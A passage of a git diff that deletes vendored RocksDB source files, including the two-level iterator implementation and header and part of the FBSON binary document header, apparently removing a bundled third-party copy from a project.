-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/two_level_iterator.cc b/thirdparty/rocksdb/table/two_level_iterator.cc
deleted file mode 100644
index 2236a2a..0000000
--- a/thirdparty/rocksdb/table/two_level_iterator.cc
+++ /dev/null
@@ -1,267 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "table/two_level_iterator.h"
-#include "db/pinned_iterators_manager.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-#include "table/block.h"
-#include "table/format.h"
-#include "util/arena.h"
-
-namespace rocksdb {
-
-namespace {
-
-class TwoLevelIterator : public InternalIterator {
- public:
-  explicit TwoLevelIterator(TwoLevelIteratorState* state,
-                            InternalIterator* first_level_iter,
-                            bool need_free_iter_and_state);
-
-  virtual ~TwoLevelIterator() {
-    // Assert that the TwoLevelIterator is never deleted while Pinning is
-    // Enabled.
-    assert(!pinned_iters_mgr_ ||
-           (pinned_iters_mgr_ && !pinned_iters_mgr_->PinningEnabled()));
-    first_level_iter_.DeleteIter(!need_free_iter_and_state_);
-    second_level_iter_.DeleteIter(false);
-    if (need_free_iter_and_state_) {
-      delete state_;
-    } else {
-      state_->~TwoLevelIteratorState();
-    }
-  }
-
-  virtual void Seek(const Slice& target) override;
-  virtual void SeekForPrev(const Slice& target) override;
-  virtual void SeekToFirst() override;
-  virtual void SeekToLast() override;
-  virtual void Next() override;
-  virtual void Prev() override;
-
-  virtual bool Valid() const override { return second_level_iter_.Valid(); }
-  virtual Slice key() const override {
-    assert(Valid());
-    return second_level_iter_.key();
-  }
-  virtual Slice value() const override {
-    assert(Valid());
-    return second_level_iter_.value();
-  }
-  virtual Status status() const override {
-    // It'd be nice if status() returned a const Status& instead of a Status
-    if (!first_level_iter_.status().ok()) {
-      return first_level_iter_.status();
-    } else if (second_level_iter_.iter() != nullptr &&
-               !second_level_iter_.status().ok()) {
-      return second_level_iter_.status();
-    } else {
-      return status_;
-    }
-  }
-  virtual void SetPinnedItersMgr(
-      PinnedIteratorsManager* pinned_iters_mgr) override {
-    pinned_iters_mgr_ = pinned_iters_mgr;
-    first_level_iter_.SetPinnedItersMgr(pinned_iters_mgr);
-    if (second_level_iter_.iter()) {
-      second_level_iter_.SetPinnedItersMgr(pinned_iters_mgr);
-    }
-  }
-  virtual bool IsKeyPinned() const override {
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           second_level_iter_.iter() && second_level_iter_.IsKeyPinned();
-  }
-  virtual bool IsValuePinned() const override {
-    return pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled() &&
-           second_level_iter_.iter() && second_level_iter_.IsValuePinned();
-  }
-
- private:
-  void SaveError(const Status& s) {
-    if (status_.ok() && !s.ok()) status_ = s;
-  }
-  void SkipEmptyDataBlocksForward();
-  void SkipEmptyDataBlocksBackward();
-  void SetSecondLevelIterator(InternalIterator* iter);
-  void InitDataBlock();
-
-  TwoLevelIteratorState* state_;
-  IteratorWrapper first_level_iter_;
-  IteratorWrapper second_level_iter_;  // May be nullptr
-  bool need_free_iter_and_state_;
-  PinnedIteratorsManager* pinned_iters_mgr_;
-  Status status_;
-  // If second_level_iter is non-nullptr, then "data_block_handle_" holds the
-  // "index_value" passed to block_function_ to create the second_level_iter.
-  std::string data_block_handle_;
-};
-
-TwoLevelIterator::TwoLevelIterator(TwoLevelIteratorState* state,
-                                   InternalIterator* first_level_iter,
-                                   bool need_free_iter_and_state)
-    : state_(state),
-      first_level_iter_(first_level_iter),
-      need_free_iter_and_state_(need_free_iter_and_state),
-      pinned_iters_mgr_(nullptr) {}
-
-void TwoLevelIterator::Seek(const Slice& target) {
-  if (state_->check_prefix_may_match &&
-      !state_->PrefixMayMatch(target)) {
-    SetSecondLevelIterator(nullptr);
-    return;
-  }
-  first_level_iter_.Seek(target);
-
-  InitDataBlock();
-  if (second_level_iter_.iter() != nullptr) {
-    second_level_iter_.Seek(target);
-  }
-  SkipEmptyDataBlocksForward();
-}
-
-void TwoLevelIterator::SeekForPrev(const Slice& target) {
-  if (state_->check_prefix_may_match && !state_->PrefixMayMatch(target)) {
-    SetSecondLevelIterator(nullptr);
-    return;
-  }
-  first_level_iter_.Seek(target);
-  InitDataBlock();
-  if (second_level_iter_.iter() != nullptr) {
-    second_level_iter_.SeekForPrev(target);
-  }
-  if (!Valid()) {
-    if (!first_level_iter_.Valid()) {
-      first_level_iter_.SeekToLast();
-      InitDataBlock();
-      if (second_level_iter_.iter() != nullptr) {
-        second_level_iter_.SeekForPrev(target);
-      }
-    }
-    SkipEmptyDataBlocksBackward();
-  }
-}
-
-void TwoLevelIterator::SeekToFirst() {
-  first_level_iter_.SeekToFirst();
-  InitDataBlock();
-  if (second_level_iter_.iter() != nullptr) {
-    second_level_iter_.SeekToFirst();
-  }
-  SkipEmptyDataBlocksForward();
-}
-
-void TwoLevelIterator::SeekToLast() {
-  first_level_iter_.SeekToLast();
-  InitDataBlock();
-  if (second_level_iter_.iter() != nullptr) {
-    second_level_iter_.SeekToLast();
-  }
-  SkipEmptyDataBlocksBackward();
-}
-
-void TwoLevelIterator::Next() {
-  assert(Valid());
-  second_level_iter_.Next();
-  SkipEmptyDataBlocksForward();
-}
-
-void TwoLevelIterator::Prev() {
-  assert(Valid());
-  second_level_iter_.Prev();
-  SkipEmptyDataBlocksBackward();
-}
-
-void TwoLevelIterator::SkipEmptyDataBlocksForward() {
-  while (second_level_iter_.iter() == nullptr ||
-         (!second_level_iter_.Valid() &&
-          !second_level_iter_.status().IsIncomplete())) {
-    // Move to next block
-    if (!first_level_iter_.Valid() ||
-        state_->KeyReachedUpperBound(first_level_iter_.key())) {
-      SetSecondLevelIterator(nullptr);
-      return;
-    }
-    first_level_iter_.Next();
-    InitDataBlock();
-    if (second_level_iter_.iter() != nullptr) {
-      second_level_iter_.SeekToFirst();
-    }
-  }
-}
-
-void TwoLevelIterator::SkipEmptyDataBlocksBackward() {
-  while (second_level_iter_.iter() == nullptr ||
-         (!second_level_iter_.Valid() &&
-          !second_level_iter_.status().IsIncomplete())) {
-    // Move to next block
-    if (!first_level_iter_.Valid()) {
-      SetSecondLevelIterator(nullptr);
-      return;
-    }
-    first_level_iter_.Prev();
-    InitDataBlock();
-    if (second_level_iter_.iter() != nullptr) {
-      second_level_iter_.SeekToLast();
-    }
-  }
-}
-
-void TwoLevelIterator::SetSecondLevelIterator(InternalIterator* iter) {
-  if (second_level_iter_.iter() != nullptr) {
-    SaveError(second_level_iter_.status());
-  }
-
-  if (pinned_iters_mgr_ && iter) {
-    iter->SetPinnedItersMgr(pinned_iters_mgr_);
-  }
-
-  InternalIterator* old_iter = second_level_iter_.Set(iter);
-  if (pinned_iters_mgr_ && pinned_iters_mgr_->PinningEnabled()) {
-    pinned_iters_mgr_->PinIterator(old_iter);
-  } else {
-    delete old_iter;
-  }
-}
-
-void TwoLevelIterator::InitDataBlock() {
-  if (!first_level_iter_.Valid()) {
-    SetSecondLevelIterator(nullptr);
-  } else {
-    Slice handle = first_level_iter_.value();
-    if (second_level_iter_.iter() != nullptr &&
-        !second_level_iter_.status().IsIncomplete() &&
-        handle.compare(data_block_handle_) == 0) {
-      // second_level_iter is already constructed with this iterator, so
-      // no need to change anything
-    } else {
-      InternalIterator* iter = state_->NewSecondaryIterator(handle);
-      data_block_handle_.assign(handle.data(), handle.size());
-      SetSecondLevelIterator(iter);
-    }
-  }
-}
-
-}  // namespace
-
-InternalIterator* NewTwoLevelIterator(TwoLevelIteratorState* state,
-                                      InternalIterator* first_level_iter,
-                                      Arena* arena,
-                                      bool need_free_iter_and_state) {
-  if (arena == nullptr) {
-    return new TwoLevelIterator(state, first_level_iter,
-                                need_free_iter_and_state);
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(TwoLevelIterator));
-    return new (mem)
-        TwoLevelIterator(state, first_level_iter, need_free_iter_and_state);
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/two_level_iterator.h b/thirdparty/rocksdb/table/two_level_iterator.h
deleted file mode 100644
index 34b33c8..0000000
--- a/thirdparty/rocksdb/table/two_level_iterator.h
+++ /dev/null
@@ -1,53 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#include "rocksdb/iterator.h"
-#include "rocksdb/env.h"
-#include "table/iterator_wrapper.h"
-
-namespace rocksdb {
-
-struct ReadOptions;
-class InternalKeyComparator;
-class Arena;
-
-struct TwoLevelIteratorState {
-  explicit TwoLevelIteratorState(bool _check_prefix_may_match)
-      : check_prefix_may_match(_check_prefix_may_match) {}
-
-  virtual ~TwoLevelIteratorState() {}
-  virtual InternalIterator* NewSecondaryIterator(const Slice& handle) = 0;
-  virtual bool PrefixMayMatch(const Slice& internal_key) = 0;
-  virtual bool KeyReachedUpperBound(const Slice& internal_key) = 0;
-
-  // If call PrefixMayMatch()
-  bool check_prefix_may_match;
-};
-
-
-// Return a new two level iterator.  A two-level iterator contains an
-// index iterator whose values point to a sequence of blocks where
-// each block is itself a sequence of key,value pairs.  The returned
-// two-level iterator yields the concatenation of all key/value pairs
-// in the sequence of blocks.  Takes ownership of "index_iter" and
-// will delete it when no longer needed.
-//
-// Uses a supplied function to convert an index_iter value into
-// an iterator over the contents of the corresponding block.
-// arena: If not null, the arena is used to allocate the Iterator.
-//        When destroying the iterator, the destructor will destroy
-//        all the states but those allocated in arena.
-// need_free_iter_and_state: free `state` and `first_level_iter` if
-//                           true. Otherwise, just call destructor.
-extern InternalIterator* NewTwoLevelIterator(
-    TwoLevelIteratorState* state, InternalIterator* first_level_iter,
-    Arena* arena = nullptr, bool need_free_iter_and_state = true);
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/third-party/fbson/COMMIT.md b/thirdparty/rocksdb/third-party/fbson/COMMIT.md
deleted file mode 100644
index b38b542..0000000
--- a/thirdparty/rocksdb/third-party/fbson/COMMIT.md
+++ /dev/null
@@ -1,5 +0,0 @@
-fbson commit: 
-https://github.com/facebook/mysql-5.6/commit/55ef9ff25c934659a70b4094e9b406c48e9dd43d
-
-# TODO.
-* Had to convert zero sized array to [1] sized arrays due to the fact that MS Compiler complains about it not being standard. At some point need to contribute this change back to MySql where this code was taken from.
diff --git a/thirdparty/rocksdb/third-party/fbson/FbsonDocument.h b/thirdparty/rocksdb/third-party/fbson/FbsonDocument.h
deleted file mode 100644
index 6fb8a93..0000000
--- a/thirdparty/rocksdb/third-party/fbson/FbsonDocument.h
+++ /dev/null
@@ -1,893 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-/*
- * This header defines FbsonDocument, FbsonKeyValue, and various value classes
- * which are derived from FbsonValue, and a forward iterator for container
- * values - essentially everything that is related to FBSON binary data
- * structures.
- *
- * Implementation notes:
- *
- * None of the classes in this header file can be instantiated directly (i.e.
- * you cannot create a FbsonKeyValue or FbsonValue object - all constructors
- * are declared non-public). We use the classes as wrappers on the packed FBSON
- * bytes (serialized), and cast the classes (types) to the underlying packed
- * byte array.
- *
- * For the same reason, we cannot define any FBSON value class to be virtual,
- * since we never call constructors, and will not instantiate vtbl and vptrs.
- *
- * Therefore, the classes are defined as packed structures (i.e. no data
- * alignment and padding), and the private member variables of the classes are
- * defined precisely in the same order as the FBSON spec. This ensures we
- * access the packed FBSON bytes correctly.
- *
- * The packed structures are highly optimized for in-place operations with low
- * overhead. The reads (and in-place writes) are performed directly on packed
- * bytes. There is no memory allocation at all at runtime.
- *
- * For updates/writes of values that will expand the original FBSON size, the
- * write will fail, and the caller needs to handle buffer increase.
- *
- * ** Iterator **
- * Both ObjectVal class and ArrayVal class have iterator type that you can use
- * to declare an iterator on a container object to go through the key-value
- * pairs or value list. The iterator has both non-const and const types.
- *
- * Note: iterators are forward direction only.
- *
- * ** Query **
- * Querying into containers is through the member functions find (for key/value
- * pairs) and get (for array elements), and is in streaming style. We don't
- * need to read/scan the whole FBSON packed bytes in order to return results.
- * Once the key/index is found, we will stop search.  You can use text to query
- * both objects and array (for array, text will be converted to integer index),
- * and use index to retrieve from array. Array index is 0-based.
- *
- * ** External dictionary **
- * During query processing, you can also pass a call-back function, so the
- * search will first try to check if the key string exists in the dictionary.
- * If so, search will be based on the id instead of the key string.
- *
- * @author Tian Xia <tianx@fb.com>
- */
-
-#ifndef FBSON_FBSONDOCUMENT_H
-#define FBSON_FBSONDOCUMENT_H
-
-#include <stdlib.h>
-#include <string.h>
-#include <assert.h>
-
-namespace fbson {
-
-#pragma pack(push, 1)
-
-#define FBSON_VER 1
-
-// forward declaration
-class FbsonValue;
-class ObjectVal;
-
-/*
- * FbsonDocument is the main object that accesses and queries FBSON packed
- * bytes. NOTE: FbsonDocument only allows object container as the top level
- * FBSON value. However, you can use the static method "createValue" to get any
- * FbsonValue object from the packed bytes.
- *
- * FbsonDocument object also dereferences to an object container value
- * (ObjectVal) once FBSON is loaded.
- *
- * ** Load **
- * FbsonDocument is usable after loading packed bytes (memory location) into
- * the object. We only need the header and first few bytes of the payload after
- * header to verify the FBSON.
- *
- * Note: creating an FbsonDocument (through createDocument) does not allocate
- * any memory. The document object is an efficient wrapper on the packed bytes
- * which is accessed directly.
- *
- * ** Query **
- * Query is through dereferencing into ObjectVal.
- */
-class FbsonDocument {
- public:
-  // create an FbsonDocument object from FBSON packed bytes
-  static FbsonDocument* createDocument(const char* pb, uint32_t size);
-
-  // create an FbsonValue from FBSON packed bytes
-  static FbsonValue* createValue(const char* pb, uint32_t size);
-
-  uint8_t version() { return header_.ver_; }
-
-  FbsonValue* getValue() { return ((FbsonValue*)payload_); }
-
-  ObjectVal* operator->() { return ((ObjectVal*)payload_); }
-
-  const ObjectVal* operator->() const { return ((const ObjectVal*)payload_); }
-
- private:
-  /*
-   * FbsonHeader class defines FBSON header (internal to FbsonDocument).
-   *
-   * Currently it only contains version information (1-byte). We may expand the
-   * header to include checksum of the FBSON binary for more security.
-   */
-  struct FbsonHeader {
-    uint8_t ver_;
-  } header_;
-
-  char payload_[1];
-
-  FbsonDocument();
-
-  FbsonDocument(const FbsonDocument&) = delete;
-  FbsonDocument& operator=(const FbsonDocument&) = delete;
-};
-
-/*
- * FbsonFwdIteratorT implements FBSON's iterator template.
- *
- * Note: it is an FORWARD iterator only due to the design of FBSON format.
- */
-template <class Iter_Type, class Cont_Type>
-class FbsonFwdIteratorT {
-  typedef Iter_Type iterator;
-  typedef typename std::iterator_traits<Iter_Type>::pointer pointer;
-  typedef typename std::iterator_traits<Iter_Type>::reference reference;
-
- public:
-  explicit FbsonFwdIteratorT(const iterator& i) : current_(i) {}
-
-  // allow non-const to const iterator conversion (same container type)
-  template <class Iter_Ty>
-  FbsonFwdIteratorT(const FbsonFwdIteratorT<Iter_Ty, Cont_Type>& rhs)
-      : current_(rhs.base()) {}
-
-  bool operator==(const FbsonFwdIteratorT& rhs) const {
-    return (current_ == rhs.current_);
-  }
-
-  bool operator!=(const FbsonFwdIteratorT& rhs) const {
-    return !operator==(rhs);
-  }
-
-  bool operator<(const FbsonFwdIteratorT& rhs) const {
-    return (current_ < rhs.current_);
-  }
-
-  bool operator>(const FbsonFwdIteratorT& rhs) const { return !operator<(rhs); }
-
-  FbsonFwdIteratorT& operator++() {
-    current_ = (iterator)(((char*)current_) + current_->numPackedBytes());
-    return *this;
-  }
-
-  FbsonFwdIteratorT operator++(int) {
-    auto tmp = *this;
-    current_ = (iterator)(((char*)current_) + current_->numPackedBytes());
-    return tmp;
-  }
-
-  explicit operator pointer() { return current_; }
-
-  reference operator*() const { return *current_; }
-
-  pointer operator->() const { return current_; }
-
-  iterator base() const { return current_; }
-
- private:
-  iterator current_;
-};
-
-typedef int (*hDictInsert)(const char* key, unsigned len);
-typedef int (*hDictFind)(const char* key, unsigned len);
-
-/*
- * FbsonType defines 10 primitive types and 2 container types, as described
- * below.
- *
- * primitive_value ::=
- *   0x00        //null value (0 byte)
- * | 0x01        //boolean true (0 byte)
- * | 0x02        //boolean false (0 byte)
- * | 0x03 int8   //char/int8 (1 byte)
- * | 0x04 int16  //int16 (2 bytes)
- * | 0x05 int32  //int32 (4 bytes)
- * | 0x06 int64  //int64 (8 bytes)
- * | 0x07 double //floating point (8 bytes)
- * | 0x08 string //variable length string
- * | 0x09 binary //variable length binary
- *
- * container ::=
- *   0x0A int32 key_value_list //object, int32 is the total bytes of the object
- * | 0x0B int32 value_list     //array, int32 is the total bytes of the array
- */
-enum class FbsonType : char {
-  T_Null = 0x00,
-  T_True = 0x01,
-  T_False = 0x02,
-  T_Int8 = 0x03,
-  T_Int16 = 0x04,
-  T_Int32 = 0x05,
-  T_Int64 = 0x06,
-  T_Double = 0x07,
-  T_String = 0x08,
-  T_Binary = 0x09,
-  T_Object = 0x0A,
-  T_Array = 0x0B,
-  NUM_TYPES,
-};
-
-typedef std::underlying_type<FbsonType>::type FbsonTypeUnder;
-
-/*
- * FbsonKeyValue class defines FBSON key type, as described below.
- *
- * key ::=
- *   0x00 int8    //1-byte dictionary id
- * | int8 (byte*) //int8 (>0) is the size of the key string
- *
- * value ::= primitive_value | container
- *
- * FbsonKeyValue can be either an id mapping to the key string in an external
- * dictionary, or it is the original key string. Whether to read an id or a
- * string is decided by the first byte (size_).
- *
- * Note: a key object must be followed by a value object. Therefore, a key
- * object implicitly refers to a key-value pair, and you can get the value
- * object right after the key object. The function numPackedBytes hence
- * indicates the total size of the key-value pair, so that we will be able go
- * to next pair from the key.
- *
- * ** Dictionary size **
- * By default, the dictionary size is 255 (1-byte). Users can define
- * "USE_LARGE_DICT" to increase the dictionary size to 655535 (2-byte).
- */
-class FbsonKeyValue {
- public:
-#ifdef USE_LARGE_DICT
-  static const int sMaxKeyId = 65535;
-  typedef uint16_t keyid_type;
-#else
-  static const int sMaxKeyId = 255;
-  typedef uint8_t keyid_type;
-#endif // #ifdef USE_LARGE_DICT
-
-  static const uint8_t sMaxKeyLen = 64;
-
-  // size of the key. 0 indicates it is stored as id
-  uint8_t klen() const { return size_; }
-
-  // get the key string. Note the string may not be null terminated.
-  const char* getKeyStr() const { return key_.str_; }
-
-  keyid_type getKeyId() const { return key_.id_; }
-
-  unsigned int keyPackedBytes() const {
-    return size_ ? (sizeof(size_) + size_)
-                 : (sizeof(size_) + sizeof(keyid_type));
-  }
-
-  FbsonValue* value() const {
-    return (FbsonValue*)(((char*)this) + keyPackedBytes());
-  }
-
-  // size of the total packed bytes (key+value)
-  unsigned int numPackedBytes() const;
-
- private:
-  uint8_t size_;
-
-  union key_ {
-    keyid_type id_;
-    char str_[1];
-  } key_;
-
-  FbsonKeyValue();
-};
-
-/*
- * FbsonValue is the base class of all FBSON types. It contains only one member
- * variable - type info, which can be retrieved by member functions is[Type]()
- * or type().
- */
-class FbsonValue {
- public:
-  static const uint32_t sMaxValueLen = 1 << 24; // 16M
-
-  bool isNull() const { return (type_ == FbsonType::T_Null); }
-  bool isTrue() const { return (type_ == FbsonType::T_True); }
-  bool isFalse() const { return (type_ == FbsonType::T_False); }
-  bool isInt8() const { return (type_ == FbsonType::T_Int8); }
-  bool isInt16() const { return (type_ == FbsonType::T_Int16); }
-  bool isInt32() const { return (type_ == FbsonType::T_Int32); }
-  bool isInt64() const { return (type_ == FbsonType::T_Int64); }
-  bool isDouble() const { return (type_ == FbsonType::T_Double); }
-  bool isString() const { return (type_ == FbsonType::T_String); }
-  bool isBinary() const { return (type_ == FbsonType::T_Binary); }
-  bool isObject() const { return (type_ == FbsonType::T_Object); }
-  bool isArray() const { return (type_ == FbsonType::T_Array); }
-
-  FbsonType type() const { return type_; }
-
-  // size of the total packed bytes
-  unsigned int numPackedBytes() const;
-
-  // size of the value in bytes
-  unsigned int size() const;
-
-  // get the raw byte array of the value
-  const char* getValuePtr() const;
-
-  // find the FBSON value by a key path string (null terminated)
-  FbsonValue* findPath(const char* key_path,
-                       const char* delim = ".",
-                       hDictFind handler = nullptr) {
-    return findPath(key_path, (unsigned int)strlen(key_path), delim, handler);
-  }
-
-  // find the FBSON value by a key path string (with length)
-  FbsonValue* findPath(const char* key_path,
-                       unsigned int len,
-                       const char* delim,
-                       hDictFind handler);
-
- protected:
-  FbsonType type_; // type info
-
-  FbsonValue();
-};
-
-/*
- * NumerValT is the template class (derived from FbsonValue) of all number
- * types (integers and double).
- */
-template <class T>
-class NumberValT : public FbsonValue {
- public:
-  T val() const { return num_; }
-
-  unsigned int numPackedBytes() const { return sizeof(FbsonValue) + sizeof(T); }
-
-  // catch all unknow specialization of the template class
-  bool setVal(T value) { return false; }
-
- private:
-  T num_;
-
-  NumberValT();
-};
-
-typedef NumberValT<int8_t> Int8Val;
-
-// override setVal for Int8Val
-template <>
-inline bool Int8Val::setVal(int8_t value) {
-  if (!isInt8()) {
-    return false;
-  }
-
-  num_ = value;
-  return true;
-}
-
-typedef NumberValT<int16_t> Int16Val;
-
-// override setVal for Int16Val
-template <>
-inline bool Int16Val::setVal(int16_t value) {
-  if (!isInt16()) {
-    return false;
-  }
-
-  num_ = value;
-  return true;
-}
-
-typedef NumberValT<int32_t> Int32Val;
-
-// override setVal for Int32Val
-template <>
-inline bool Int32Val::setVal(int32_t value) {
-  if (!isInt32()) {
-    return false;
-  }
-
-  num_ = value;
-  return true;
-}
-
-typedef NumberValT<int64_t> Int64Val;
-
-// override setVal for Int64Val
-template <>
-inline bool Int64Val::setVal(int64_t value) {
-  if (!isInt64()) {
-    return false;
-  }
-
-  num_ = value;
-  return true;
-}
-
-typedef NumberValT<double> DoubleVal;
-
-// override setVal for DoubleVal
-template <>
-inline bool DoubleVal::setVal(double value) {
-  if (!isDouble()) {
-    return false;
-  }
-
-  num_ = value;
-  return true;
-}
-
-/*
- * BlobVal is the base class (derived from FbsonValue) for string and binary
- * types. The size_ indicates the total bytes of the payload_.
- */
-class BlobVal : public FbsonValue {
- public:
-  // size of the blob payload only
-  unsigned int getBlobLen() const { return size_; }
-
-  // return the blob as byte array
-  const char* getBlob() const { return payload_; }
-
-  // size of the total packed bytes
-  unsigned int numPackedBytes() const {
-    return sizeof(FbsonValue) + sizeof(size_) + size_;
-  }
-
- protected:
-  uint32_t size_;
-  char payload_[1];
-
-  // set new blob bytes
-  bool internalSetVal(const char* blob, uint32_t blobSize) {
-    // if we cannot fit the new blob, fail the operation
-    if (blobSize > size_) {
-      return false;
-    }
-
-    memcpy(payload_, blob, blobSize);
-
-    // Set the reset of the bytes to 0.  Note we cannot change the size_ of the
-    // current payload, as all values are packed.
-    memset(payload_ + blobSize, 0, size_ - blobSize);
-
-    return true;
-  }
-
-  BlobVal();
-
- private:
-  // Disable as this class can only be allocated dynamically
-  BlobVal(const BlobVal&) = delete;
-  BlobVal& operator=(const BlobVal&) = delete;
-};
-
-/*
- * Binary type
- */
-class BinaryVal : public BlobVal {
- public:
-  bool setVal(const char* blob, uint32_t blobSize) {
-    if (!isBinary()) {
-      return false;
-    }
-
-    return internalSetVal(blob, blobSize);
-  }
-
- private:
-  BinaryVal();
-};
-
-/*
- * String type
- * Note: FBSON string may not be a c-string (NULL-terminated)
- */
-class StringVal : public BlobVal {
- public:
-  bool setVal(const char* str, uint32_t blobSize) {
-    if (!isString()) {
-      return false;
-    }
-
-    return internalSetVal(str, blobSize);
-  }
-
- private:
-  StringVal();
-};
-
-/*
- * ContainerVal is the base class (derived from FbsonValue) for object and
- * array types. The size_ indicates the total bytes of the payload_.
- */
-class ContainerVal : public FbsonValue {
- public:
-  // size of the container payload only
-  unsigned int getContainerSize() const { return size_; }
-
-  // return the container payload as byte array
-  const char* getPayload() const { return payload_; }
-
-  // size of the total packed bytes
-  unsigned int numPackedBytes() const {
-    return sizeof(FbsonValue) + sizeof(size_) + size_;
-  }
-
- protected:
-  uint32_t size_;
-  char payload_[1];
-
-  ContainerVal();
-
-  ContainerVal(const ContainerVal&) = delete;
-  ContainerVal& operator=(const ContainerVal&) = delete;
-};
-
-/*
- * Object type
- */
-class ObjectVal : public ContainerVal {
- public:
-  // find the FBSON value by a key string (null terminated)
-  FbsonValue* find(const char* key, hDictFind handler = nullptr) const {
-    if (!key)
-      return nullptr;
-
-    return find(key, (unsigned int)strlen(key), handler);
-  }
-
-  // find the FBSON value by a key string (with length)
-  FbsonValue* find(const char* key,
-                   unsigned int klen,
-                   hDictFind handler = nullptr) const {
-    if (!key || !klen)
-      return nullptr;
-
-    int key_id = -1;
-    if (handler && (key_id = handler(key, klen)) >= 0) {
-      return find(key_id);
-    }
-
-    return internalFind(key, klen);
-  }
-
-  // find the FBSON value by a key dictionary ID
-  FbsonValue* find(int key_id) const {
-    if (key_id < 0 || key_id > FbsonKeyValue::sMaxKeyId)
-      return nullptr;
-
-    const char* pch = payload_;
-    const char* fence = payload_ + size_;
-
-    while (pch < fence) {
-      FbsonKeyValue* pkey = (FbsonKeyValue*)(pch);
-      if (!pkey->klen() && key_id == pkey->getKeyId()) {
-        return pkey->value();
-      }
-      pch += pkey->numPackedBytes();
-    }
-
-    assert(pch == fence);
-
-    return nullptr;
-  }
-
-  typedef FbsonKeyValue value_type;
-  typedef value_type* pointer;
-  typedef const value_type* const_pointer;
-  typedef FbsonFwdIteratorT<pointer, ObjectVal> iterator;
-  typedef FbsonFwdIteratorT<const_pointer, ObjectVal> const_iterator;
-
-  iterator begin() { return iterator((pointer)payload_); }
-
-  const_iterator begin() const { return const_iterator((pointer)payload_); }
-
-  iterator end() { return iterator((pointer)(payload_ + size_)); }
-
-  const_iterator end() const {
-    return const_iterator((pointer)(payload_ + size_));
-  }
-
- private:
-  FbsonValue* internalFind(const char* key, unsigned int klen) const {
-    const char* pch = payload_;
-    const char* fence = payload_ + size_;
-
-    while (pch < fence) {
-      FbsonKeyValue* pkey = (FbsonKeyValue*)(pch);
-      if (klen == pkey->klen() && strncmp(key, pkey->getKeyStr(), klen) == 0) {
-        return pkey->value();
-      }
-      pch += pkey->numPackedBytes();
-    }
-
-    assert(pch == fence);
-
-    return nullptr;
-  }
-
- private:
-  ObjectVal();
-};
-
-/*
- * Array type
- */
-class ArrayVal : public ContainerVal {
- public:
-  // get the FBSON value at index
-  FbsonValue* get(int idx) const {
-    if (idx < 0)
-      return nullptr;
-
-    const char* pch = payload_;
-    const char* fence = payload_ + size_;
-
-    while (pch < fence && idx-- > 0)
-      pch += ((FbsonValue*)pch)->numPackedBytes();
-
-    if (idx == -1)
-      return (FbsonValue*)pch;
-    else {
-      assert(pch == fence);
-      return nullptr;
-    }
-  }
-
-  // Get number of elements in array
-  unsigned int numElem() const {
-    const char* pch = payload_;
-    const char* fence = payload_ + size_;
-
-    unsigned int num = 0;
-    while (pch < fence) {
-      ++num;
-      pch += ((FbsonValue*)pch)->numPackedBytes();
-    }
-
-    assert(pch == fence);
-
-    return num;
-  }
-
-  typedef FbsonValue value_type;
-  typedef value_type* pointer;
-  typedef const value_type* const_pointer;
-  typedef FbsonFwdIteratorT<pointer, ArrayVal> iterator;
-  typedef FbsonFwdIteratorT<const_pointer, ArrayVal> const_iterator;
-
-  iterator begin() { return iterator((pointer)payload_); }
-
-  const_iterator begin() const { return const_iterator((pointer)payload_); }
-
-  iterator end() { return iterator((pointer)(payload_ + size_)); }
-
-  const_iterator end() const {
-    return const_iterator((pointer)(payload_ + size_));
-  }
-
- private:
-  ArrayVal();
-};
-
-inline FbsonDocument* FbsonDocument::createDocument(const char* pb,
-                                                    uint32_t size) {
-  if (!pb || size < sizeof(FbsonHeader) + sizeof(FbsonValue)) {
-    return nullptr;
-  }
-
-  FbsonDocument* doc = (FbsonDocument*)pb;
-  if (doc->header_.ver_ != FBSON_VER) {
-    return nullptr;
-  }
-
-  FbsonValue* val = (FbsonValue*)doc->payload_;
-  if (!val->isObject() || size != sizeof(FbsonHeader) + val->numPackedBytes()) {
-    return nullptr;
-  }
-
-  return doc;
-}
-
-inline FbsonValue* FbsonDocument::createValue(const char* pb, uint32_t size) {
-  if (!pb || size < sizeof(FbsonHeader) + sizeof(FbsonValue)) {
-    return nullptr;
-  }
-
-  FbsonDocument* doc = (FbsonDocument*)pb;
-  if (doc->header_.ver_ != FBSON_VER) {
-    return nullptr;
-  }
-
-  FbsonValue* val = (FbsonValue*)doc->payload_;
-  if (size != sizeof(FbsonHeader) + val->numPackedBytes()) {
-    return nullptr;
-  }
-
-  return val;
-}
-
-inline unsigned int FbsonKeyValue::numPackedBytes() const {
-  unsigned int ks = keyPackedBytes();
-  FbsonValue* val = (FbsonValue*)(((char*)this) + ks);
-  return ks + val->numPackedBytes();
-}
-
-// Poor man's "virtual" function FbsonValue::numPackedBytes
-inline unsigned int FbsonValue::numPackedBytes() const {
-  switch (type_) {
-  case FbsonType::T_Null:
-  case FbsonType::T_True:
-  case FbsonType::T_False: {
-    return sizeof(type_);
-  }
-
-  case FbsonType::T_Int8: {
-    return sizeof(type_) + sizeof(int8_t);
-  }
